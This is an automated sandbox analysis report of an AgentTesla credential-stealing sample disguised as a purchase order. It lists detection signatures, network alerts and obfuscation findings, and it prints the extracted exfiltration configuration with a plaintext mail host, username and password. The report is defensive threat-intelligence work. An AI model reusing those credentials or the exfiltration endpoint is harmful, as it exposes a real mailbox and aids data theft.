Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
NEW ORDER 98540-0.exe

Overview

General Information

Sample name:NEW ORDER 98540-0.exe
Analysis ID:1408956
MD5:df93e537cd7ba3dbc8fefe3e5aff9e0a
SHA1:7a04c2ba75e5bacb7052388d0fe32b2ce3e0fc3b
SHA256:7a20de1b4a4cd2e217be33f3297d2b38d7e7fd69ee216d58f0400160e41ff3ea
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses 32bit PE files
Uses SMTP (mail sending)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • NEW ORDER 98540-0.exe (PID: 6028 cmdline: C:\Users\user\Desktop\NEW ORDER 98540-0.exe MD5: DF93E537CD7BA3DBC8FEFE3E5AFF9E0A)
    • NEW ORDER 98540-0.exe (PID: 5476 cmdline: C:\Users\user\Desktop\NEW ORDER 98540-0.exe MD5: DF93E537CD7BA3DBC8FEFE3E5AFF9E0A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.3341066327.000000000323E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000003.00000002.3341066327.00000000031F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            0.2.NEW ORDER 98540-0.exe.438fb80.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.NEW ORDER 98540-0.exe.438fb80.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.NEW ORDER 98540-0.exe.438fb80.6.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x316c3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x31735:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x317bf:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31851:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x318bb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3192d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x319c3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31a53:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                0.2.NEW ORDER 98540-0.exe.4355160.8.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.NEW ORDER 98540-0.exe.4355160.8.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 12 entries

                    System Summary

                    barindex
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\NEW ORDER 98540-0.exe, Initiated: true, ProcessId: 5476, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49712
                    Timestamp:03/14/24-14:11:01.303269
                    SID:2030171
                    Source Port:49712
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:03/14/24-14:11:01.303269
                    SID:2839723
                    Source Port:49712
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}
                    Source: NEW ORDER 98540-0.exeReversingLabs: Detection: 34%
                    Source: NEW ORDER 98540-0.exeJoe Sandbox ML: detected
                    Source: NEW ORDER 98540-0.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: NEW ORDER 98540-0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.6:49712 -> 50.87.139.143:587
                    Source: TrafficSnort IDS: 2839723 ETPRO TROJAN Win32/Agent Tesla SMTP Activity 192.168.2.6:49712 -> 50.87.139.143:587
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.6:49712 -> 50.87.139.143:587
                    Source: Joe Sandbox ViewIP Address: 50.87.139.143 50.87.139.143
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: global trafficTCP traffic: 192.168.2.6:49712 -> 50.87.139.143:587
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownDNS traffic detected: queries for: mail.elec-qatar.com
                    Source: NEW ORDER 98540-0.exe, 00000003.00000002.3341066327.0000000003246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.elec-qatar.com
                    Source: NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmp, NEW ORDER 98540-0.exe, 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, NmHr1WHWKO.cs.Net Code: IiB
                    Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, NmHr1WHWKO.cs.Net Code: IiB

                    System Summary

                    barindex
                    Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: initial sampleStatic PE information: Filename: NEW ORDER 98540-0.exe
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_01378C700_2_01378C70
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_01377C020_2_01377C02
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_01378D110_2_01378D11
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_01378F820_2_01378F82
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_013774580_2_01377458
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_055CABA00_2_055CABA0
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_055C2D000_2_055C2D00
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_055C2CF00_2_055C2CF0
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_055C09440_2_055C0944
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 0_2_055CAB900_2_055CAB90
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_030D9B303_2_030D9B30
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_030D4A983_2_030D4A98
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_030D3E803_2_030D3E80
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_030DCDA83_2_030DCDA8
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_030D41C83_2_030D41C8
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067C56C83_2_067C56C8
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067C3F403_2_067C3F40
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067CDCF83_2_067CDCF8
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067CBCF03_2_067CBCF0
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067C2AF83_2_067C2AF8
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067C9AD03_2_067C9AD0
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067C8BFB3_2_067C8BFB
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067C00403_2_067C0040
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067C4FE83_2_067C4FE8
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeCode function: 3_2_067C32333_2_067C3233
                    Source: NEW ORDER 98540-0.exe, 00000000.00000002.2108459094.0000000003155000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs NEW ORDER 98540-0.exe
                    Source: NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs NEW ORDER 98540-0.exe
                    Source: NEW ORDER 98540-0.exe, 00000000.00000002.2109019599.00000000042CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs NEW ORDER 98540-0.exe
                    Source: NEW ORDER 98540-0.exe, 00000000.00000002.2107788607.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NEW ORDER 98540-0.exe
                    Source: NEW ORDER 98540-0.exe, 00000000.00000002.2111404130.0000000007620000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs NEW ORDER 98540-0.exe
                    Source: NEW ORDER 98540-0.exe, 00000003.00000002.3339119866.0000000001359000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs NEW ORDER 98540-0.exe
                    Source: NEW ORDER 98540-0.exe, 00000003.00000002.3338945387.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameecf3ed1c-5c3b-4038-87a8-401c6c5075d4.exe4 vs NEW ORDER 98540-0.exe
                    Source: NEW ORDER 98540-0.exeBinary or memory string: OriginalFilenamenZow.exeB vs NEW ORDER 98540-0.exe
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: NEW ORDER 98540-0.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 3.2.NEW ORDER 98540-0.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.NEW ORDER 98540-0.exe.438fb80.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: NEW ORDER 98540-0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, ISZbPXDvPz.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, nAXAT51m.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, YpS.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.NEW ORDER 98540-0.exe.4355160.8.raw.unpack, YpS.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, b8twtfyFxeIQtw5F0G.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, b8twtfyFxeIQtw5F0G.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER 98540-0.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeMutant created: NULL
                    Source: NEW ORDER 98540-0.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: NEW ORDER 98540-0.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: NEW ORDER 98540-0.exeReversingLabs: Detection: 34%
                    Source: unknownProcess created: C:\Users\user\Desktop\NEW ORDER 98540-0.exe C:\Users\user\Desktop\NEW ORDER 98540-0.exe
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess created: C:\Users\user\Desktop\NEW ORDER 98540-0.exe C:\Users\user\Desktop\NEW ORDER 98540-0.exe
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeProcess created: C:\Users\user\Desktop\NEW ORDER 98540-0.exe C:\Users\user\Desktop\NEW ORDER 98540-0.exeJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\NEW ORDER 98540-0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: NEW ORDER 98540-0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: NEW ORDER 98540-0.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    Source: NEW ORDER 98540-0.exe, --.cs.Net Code: _0008 System.AppDomain.Load(byte[])
                    Source: NEW ORDER 98540-0.exe, --.cs.Net Code: _0008 contains xor as well as GetObject
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, fHXvykMgXmg0e7ArtG.cs.Net Code: GSrT2SV88c System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.NEW ORDER 98540-0.exe.4458f90.7.raw.unpack, fHXvykMgXmg0e7ArtG.cs.Net Code: GSrT2SV88c System.Reflection.Assembly.Load(byte[])
                    Source: NEW ORDER 98540-0.exeStatic PE information: section name: .text entropy: 7.9521127631868005
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, MpXysIaBDSPVFB0yTd.csHigh entropy of concatenated method names: 'uHnhsoyUZI', 'sNWhGOtDAL', 'yf1hvJ1GHI', 'fsFhrbvjJW', 'CbDhkAW1fW', 'lrqhpshUKk', 'KnrhMB8uXk', 'GpMhly5Cag', 'M0LhSwfIUw', 'g4Ch1aM2Vo'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, lnblCeeykDavJbFESN.csHigh entropy of concatenated method names: 'vOvpsfILiN', 'Vc5pv3Zqvd', 'gIJpkm9ODd', 'axFkb5yJDU', 'nk0kzVB5X6', 'NX5pHWNtIm', 'o6spAD3ZGG', 'ynWpUdYWD8', 'vGfpq4W3wr', 'fe6pT7nFZP'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, mQGffPbFAA8IEcj98t.csHigh entropy of concatenated method names: 'CHXEATO6Xm', 'zu9EqpHNKU', 'X6SETmy5VD', 'kjIEsiOpsY', 'WKoEGh60eA', 'e8AErrrNci', 'coMEkO0E2L', 'jDAhxYr3UU', 'dbDha5uPHa', 'HjVhC9OtVR'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, HVHn2g3Q4LfsM7dyVK.csHigh entropy of concatenated method names: 'YyatSnHGd2', 'Q7Rt1mjJkl', 'ToString', 'YHJts0veGB', 'KuAtG8m2Au', 'hF5tv5T3WV', 'YYvtrfPCyb', 'DbXtkGOwST', 'kottp3ehFQ', 'ILbtMnS1Ko'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, UYdeq7CoZY7D8MKIGo.csHigh entropy of concatenated method names: 'qXnhBGyte8', 'vFWh5mRYxO', 'QyRhgYcsxx', 'gAIh9M2MVn', 'xOPhwQDFbp', 'X9LhQFxEFG', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, r4D6nA4ylfJKbPA8Hx.csHigh entropy of concatenated method names: 'HM2pPj4KIA', 'QelpmKVSJR', 'CXqp2MpqsM', 'iAOpIllM9Q', 'tCXp0tM9VK', 'ATWp82ITsS', 'v3XpjxjbKv', 'UGXpyP0Btb', 'lK2pJnJ6nv', 'mWUpXUXC0v'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, XLNrvkGXXVcIvSsY94.csHigh entropy of concatenated method names: 'Dispose', 'ewkACqArxA', 'PNdU5ZMoTN', 'Mk8YYQCwrs', 'r4pAbXysIB', 'nSPAzVFB0y', 'ProcessDialogKey', 'dduUHYdeq7', 'oZYUA7D8MK', 'AGoUU1QGff'
                    Source: 0.2.NEW ORDER 98540-0.exe.7620000.11.raw.unpack, wLIAKIAH7d9yDyNmdO3.csHigh entropy of concatenated method names: 'gviEPnU80e', 'FVjEmOXdk3', 'QYlE2micL1', 'NXlEI49LKM', 'fXSE0r1oc0', 'I82E8sV1oe', 'G1kEjx6WmB', 'E6bEy1vQBI', 'lfvEJ7xQht', 'SrLEXUFQ2C'
